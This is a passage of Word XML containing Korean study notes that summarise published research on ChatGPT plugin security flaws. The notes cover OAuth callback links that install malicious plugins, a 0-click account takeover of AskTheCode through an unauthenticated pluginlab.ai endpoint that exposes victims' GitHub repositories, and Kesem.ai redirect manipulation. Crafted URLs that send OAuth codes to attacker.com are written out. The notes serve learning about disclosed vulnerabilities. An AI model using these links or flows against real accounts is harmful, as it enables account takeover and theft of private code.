        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B34C74">
        <w:t>https://chat.openai.com/aip/{plugin_ID}/oauth/callback?code={secret_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B34C74">
        <w:t>code}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link를 보낼 수 있다.</w:t>
      </w:r>
      <w:r w:rsidR="00B34C74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7128F895" w14:textId="570B729B" w:rsidR="00B34C74" w:rsidRDefault="00B34C74" w:rsidP="0001208A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B34C74">
        <w:t>https://chat.openai.com/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34C74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{malicious_plugin_id}/callback?code={attacker_code_from_malicious_plugin}</w:t>
      </w:r>
      <w:r w:rsidR="0001208A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32048D74" w14:textId="1A7DE515" w:rsidR="004A5EF9" w:rsidRDefault="0001208A" w:rsidP="0001208A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이 때, </w:t>
      </w:r>
      <w:r w:rsidRPr="0001208A">
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0001208A">
        <w:t>malicious_plugin_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0001208A">
        <w:t>}는 공격자가 피해자의 계정에 설치하려는 플러그인의 식별자</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이며, </w:t>
      </w:r>
      <w:r w:rsidRPr="0001208A">
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0001208A">
        <w:t>attacker_code_from_malicious_plugin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0001208A">
        <w:t>}는 공격자가 플러그인에서 받은 코드</w:t>
      </w:r>
      <w:r w:rsidR="00B34C74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이다. 이 link를 누르면 malicious plugin이 victim에게 install되고 victim이 적는 any new </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B34C74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>message 는</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B34C74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> plugin에게 전달 될 것이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFC0ECC" w14:textId="77777777" w:rsidR="00654B68" w:rsidRDefault="00654B68" w:rsidP="0001208A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4428EBFE" w14:textId="4800C16E" w:rsidR="0001208A" w:rsidRDefault="00654B68" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00654B68">
        <w:t>-click account takeover on multiple plugins, enables attackers to gain control of an organization's account on third-party websites like GitHub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6796DC59" w14:textId="4AA96200" w:rsidR="00654B68" w:rsidRPr="00654B68" w:rsidRDefault="00654B68" w:rsidP="00654B68">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00654B68">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>플러그인</w:t>
      </w:r>
      <w:r w:rsidRPr="00654B68">
        <w:t xml:space="preserve"> 설치 시 GitHub와 상호작용하는 플러그인은 플러그인 웹사이트에서 추가 계정을 생성하고 GitHub 자격 증명을 저장합니다. 공격자가 이 플러그인 계정을 장악하면, 피해자의 GitHub 저장소에 접근할 수 있습니다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>예시로</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AskTheCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" 플러그인을 사용하여 GitHub 저장소에 질문할 수 있습니다. 이 플러그인을 사용하는 사용자는 GitHub 저장소에 대한 접근을 허용합니다. "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AskTheCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" 플러그인에서의 계정 탈취는 공격자가 피해자의 GitHub 저장소에 접근할 수 있게 합니다.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t xml:space="preserve"> 그림은 공격자가 피해자 Dan Brown(더이상 사용되지 않는 GitHub ID: moreisless3dan)의 GitHub 저장소에서 비공개 파일을 읽는 모습을 보여줍니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C83B156" w14:textId="4CF1B756" w:rsidR="0001208A" w:rsidRDefault="00654B68" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="144F3105" wp14:editId="26FE42B5">
            <wp:extent cx="4042885" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29408180" name="그림 5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8180" name="그림 5" descr="텍스트, 스크린샷, 소프트웨어, 웹 페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92" cy="298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9EE2" w14:textId="77777777" w:rsidR="00654B68" w:rsidRDefault="00654B68" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1930A8F7" w14:textId="0F774B3A" w:rsidR="00654B68" w:rsidRDefault="00654B68" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A70CDB3" wp14:editId="3FEDF5DF">
            <wp:extent cx="5731510" cy="2746375"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1600611689" name="그림 6" descr="텍스트, 스크린샷, 인간의 얼굴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1689" name="그림 6" descr="텍스트, 스크린샷, 인간의 얼굴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BFB3" w14:textId="56CC5FA3" w:rsidR="00654B68" w:rsidRDefault="00654B68" w:rsidP="00654B68">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AskTheCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">는 사용자를 위해 새 계정을 생성하고 GitHub 계정에 대한 접근 권한을 요청합니다. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AskTheCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>는 GitHub 자격 증명을 저장합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0B0C92" w14:textId="612FFB24" w:rsidR="00654B68" w:rsidRDefault="00654B68" w:rsidP="00654B68">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AskTheCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>는 ChatGPT에 코드를 생성합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EE0F03" w14:textId="019DBC34" w:rsidR="00654B68" w:rsidRDefault="00654B68" w:rsidP="00654B68">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ChatGPT는 이 코드를 사용하여 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AskTheCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>에서 사용자 계정에 연결합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B71C0B9" w14:textId="5897931C" w:rsidR="00654B68" w:rsidRDefault="00654B68" w:rsidP="00654B68">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>플러그인이</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 설치됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774643DD" w14:textId="6994DFFA" w:rsidR="00A55767" w:rsidRDefault="00654B68" w:rsidP="00654B68">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00654B68">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>코드는</w:t>
      </w:r>
      <w:r w:rsidRPr="00654B68">
        <w:t xml:space="preserve"> ChatGPT가 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00654B68">
        <w:t>AskTheCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00654B68">
        <w:t>에서 Dan의 계정에 연결하는 데 사용됩니다.</w:t>
      </w:r>
      <w:r w:rsidR="004C451B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C451B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AskTheCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004C451B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">는 </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="004C451B" w:rsidRPr="008B4612">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>https://auth.pluginlab.ai/oauth/authorize</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004C451B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> request를 통해 user의 member Id에 대한 코드를 검색하고 response로 받은 코드를 user를 거쳐 ChatGPT로 redirect한다. </w:t>
      </w:r>
      <w:r w:rsidR="004C451B" w:rsidRPr="004C451B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">https://auth.pluginlab.ai/oauth/authorized는 요청을 인증하지 않으므로, </w:t>
      </w:r>
      <w:r w:rsidR="004C451B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r w:rsidR="004C451B" w:rsidRPr="004C451B">
        <w:t xml:space="preserve">는 다른 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C451B" w:rsidRPr="004C451B">
        <w:t>memberId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004C451B" w:rsidRPr="004C451B">
        <w:t xml:space="preserve">(즉, 피해자)를 삽입하여 </w:t>
      </w:r>
      <w:r w:rsidR="004C451B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>victim을</w:t>
      </w:r>
      <w:r w:rsidR="004C451B" w:rsidRPr="004C451B">
        <w:t xml:space="preserve"> 나타내는 코드를 받을 수 있습니다. 이 코드로 ChatGPT를 사용하여</w:t>
      </w:r>
      <w:r w:rsidR="004C451B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> victim</w:t>
      </w:r>
      <w:r w:rsidR="004C451B" w:rsidRPr="004C451B">
        <w:t>의 GitHub에 접근할 수 있습니다.</w:t>
      </w:r>
      <w:r w:rsidR="004C451B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacker에게 필요한 것은 victim의 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C451B">
        <w:t>member</w:t>
      </w:r>
      <w:r w:rsidR="004C451B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004C451B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">뿐이며, </w:t>
      </w:r>
      <w:r w:rsidR="00A55767" w:rsidRPr="00A55767">
        <w:t xml:space="preserve">https://auth.pluginlab.ai/members/requestMagicEmailCode </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A55767" w:rsidRPr="00A55767">
        <w:t>엔드포인트를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A55767" w:rsidRPr="00A55767">
        <w:t xml:space="preserve"> 사용하여 얻을 수 있습니다. 이 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A55767" w:rsidRPr="00A55767">
        <w:t>엔드포인트는</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A55767" w:rsidRPr="00A55767">
        <w:t xml:space="preserve"> 이메일을 받아 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A55767" w:rsidRPr="00A55767">
        <w:t>memberID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A55767" w:rsidRPr="00A55767">
        <w:t>와 다른 데이터를 반환합니다</w:t>
      </w:r>
      <w:r w:rsidR="00A55767">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2537BC08" w14:textId="27F8CFAB" w:rsidR="00A55767" w:rsidRPr="004C451B" w:rsidRDefault="00A55767" w:rsidP="00654B68">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">attacker가 victim의 email을 안다면 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A55767">
        <w:t xml:space="preserve">https://auth.pluginlab.ai/members/requestMagicEmailCode </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A55767">
        <w:t>엔드포인트를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A55767">
        <w:t xml:space="preserve"> 사용하여</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> victim의 </w:t>
      </w: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를 얻을 수도 있고, 직접 SHA1 값을 계산할 수도 있다. attacker는 ChatGPT로 가서 자신의 계정에 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A55767">
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A55767">
        <w:t>AskTheCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A55767">
        <w:t>" 플러그인을 설치하고</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A55767">
        <w:t>https://auth.pluginlab.ai/oauth/authorized 요청을</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 가로채고 </w:t>
      </w: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>를 victim 거를 사용하여 victim의 code를 받고, 이를 ChatGPT에 전달한다. attacker는 ChatGPT를 통해 victim의 GitHub의 data를 가져올 수 있다. 0-click attack이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3290EE48" w14:textId="77777777" w:rsidR="00654B68" w:rsidRDefault="00654B68" w:rsidP="00654B68">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42FD350D" w14:textId="4B306A2D" w:rsidR="00FD7B45" w:rsidRDefault="00FD7B45" w:rsidP="00654B68">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OAuth redirection manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3792DECD" w14:textId="14173A5B" w:rsidR="00FD7B45" w:rsidRDefault="00FD7B45" w:rsidP="00654B68">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD7B45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용자를</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7B45">
        <w:t xml:space="preserve"> kesem.ai로 리디렉션하여 OAuth 코드를 가져옵니다</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10009060" w14:textId="2F725D97" w:rsidR="00FD7B45" w:rsidRDefault="00FD7B45" w:rsidP="00654B68">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="008B4612">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>https://app.kesem.ai/login?response_type=code&amp;client_id=474480292958-cjuv2hh070hr6ad6ei8h9slved6vng0d.apps.googleusercontent.com&amp;redirect_uri=https://chat.openai.com/aip/plugin-fac4e968-c6a5-4fc9-b578-11d958122868/oauth/callback&amp;scope=&amp;state=34881ee1-98e1-4b54-8643-3c561178f1b3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F8986EB" w14:textId="2FDCBFC4" w:rsidR="00FD7B45" w:rsidRDefault="00FD7B45" w:rsidP="00654B68">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD7B45">
        <w:t>Kesem.ai는 사용자를 Google/Microsoft 또는 이메일을 통해 인증하고 코드를 생성합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D161952" w14:textId="3A46536F" w:rsidR="00FD7B45" w:rsidRDefault="00FD7B45" w:rsidP="00654B68">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD7B45">
        <w:t xml:space="preserve">Kesem.ai는 1단계의 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD7B45">
        <w:t>redirect_uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD7B45">
        <w:t>로 코드를 전달합니다</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0E2FA9" w14:textId="77777777" w:rsidR="00FD7B45" w:rsidRDefault="00FD7B45" w:rsidP="00654B68">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61049243" w14:textId="6271CCE6" w:rsidR="00FD7B45" w:rsidRDefault="00FD7B45" w:rsidP="00654B68">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">attacker가 victim에게 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E88620" w14:textId="65FBEC71" w:rsidR="00FD7B45" w:rsidRDefault="00FD7B45" w:rsidP="00654B68">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="008B4612">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>https://app.kesem.ai/login?response_type=code&amp;client_id=474480292958-cjuv2hh070hr6ad6ei8h9slved6vng0d.apps.googleusercontent.com&amp;redirect_uri=https://attacker.com&amp;scope=&amp;state=34881ee1-98e1-4b54-8643-3c561178f1b3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="538F3C63" w14:textId="1A45D9AE" w:rsidR="00FD7B45" w:rsidRDefault="00FD7B45" w:rsidP="00654B68">
      <w:pPr>
        <w:jc w:val="both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보내면, Kesem.ai는 victim의 이메일 인증이후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인 </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="008B4612">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>https://attacker.com&amp;scope=&amp;state=34881ee1-98e1-4b54-8643-3c561178f1b3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="546DEC6F" w14:textId="55D31F87" w:rsidR="00FD7B45" w:rsidRPr="00FD7B45" w:rsidRDefault="00FD7B45" w:rsidP="00654B68">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 코드를 전달하고 attacker는 victim의 code를 가지고 있어 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007C0283">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kesem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007C0283">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ai와 연결된 chat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007C0283">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>gpt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007C0283">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>account를 가져올 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FD7B45" w:rsidRPr="00FD7B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5C910" w14:textId="77777777" w:rsidR="00A6310B" w:rsidRDefault="00A6310B" w:rsidP="00DC4174">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3BF34BF8" w14:textId="77777777" w:rsidR="00A6310B" w:rsidRDefault="00A6310B" w:rsidP="00DC41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A584D" w14:textId="77777777" w:rsidR="00A6310B" w:rsidRDefault="00A6310B" w:rsidP="00DC4174">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4B4D5F1E" w14:textId="77777777" w:rsidR="00A6310B" w:rsidRDefault="00A6310B" w:rsidP="00DC41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97"/>
    <w:rsid w:val="0001208A"/>
    <w:rsid w:val="001C2A41"/>
    <w:rsid w:val="00235B97"/>
    <w:rsid w:val="00264DB3"/>
    <w:rsid w:val="002D5A00"/>
    <w:rsid w:val="00385845"/>
    <w:rsid w:val="004A5EF9"/>
    <w:rsid w:val="004C451B"/>
    <w:rsid w:val="004E2E3A"/>
    <w:rsid w:val="005F3F0A"/>
    <w:rsid w:val="006242CA"/>
    <w:rsid w:val="00654B68"/>
    <w:rsid w:val="00656A59"/>
    <w:rsid w:val="006D18CD"/>
    <w:rsid w:val="007A5CE0"/>
    <w:rsid w:val="007C0283"/>
    <w:rsid w:val="008F49CD"/>
    <w:rsid w:val="009D1AD6"/>
    <w:rsid w:val="00A1409C"/>
    <w:rsid w:val="00A55767"/>
    <w:rsid w:val="00A6310B"/>
    <w:rsid w:val="00AD2DD0"/>
    <w:rsid w:val="00AF0B7D"/>
    <w:rsid w:val="00B05CE4"/>
    <w:rsid w:val="00B240DA"/>
    <w:rsid w:val="00B34C74"/>
    <w:rsid w:val="00DC4174"/>
    <w:rsid w:val="00E90A12"/>
    <w:rsid w:val="00EB41A6"/>
    <w:rsid w:val="00FD7B45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5CF4D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C5CDA138-A9B3-4796-AAB0-081F43E8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5B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5B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5B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5B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5B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5B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5B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5B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5B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35B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5B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5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5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5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5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5B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5B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5B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5B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5B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5B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5B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5B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5B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5B9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C417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C4174"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char4"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DC41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C4174"/>
  </w:style>
  <w:style w:type="character" w:styleId="ac">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DC417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%2F..%2Fapi/auth/session?cachebuster=123" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://auth.pluginlab.ai/oauth/authoriz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kline.github.io/bugbounty/2024/02/04/ChatGPT-ATO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ttacker.com&amp;scope=&amp;state=34881ee1-98e1-4b54-8643-3c561178f1b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mperva.com/blog/xss-marks-the-spot-digging-up-vulnerabilities-in-chatgpt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app.kesem.ai/login?response_type=code&amp;client_id=474480292958-cjuv2hh070hr6ad6ei8h9slved6vng0d.apps.googleusercontent.com&amp;redirect_uri=https://attacker.com&amp;scope=&amp;state=34881ee1-98e1-4b54-8643-3c561178f1b3" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://salt.security/blog/security-flaws-within-chatgpt-extensions-allowed-access-to-accounts-on-third-party-websites-and-sensitive-dat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app.kesem.ai/login?response_type=code&amp;client_id=474480292958-cjuv2hh070hr6ad6ei8h9slved6vng0d.apps.googleusercontent.com&amp;redirect_uri=https://chat.openai.com/aip/plugin-fac4e968-c6a5-4fc9-b578-11d958122868/oauth/callback&amp;scope=&amp;state=34881ee1-98e1-4b54-8643-3c561178f1b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장한결</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>장한결</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-18T02:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-18T08:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>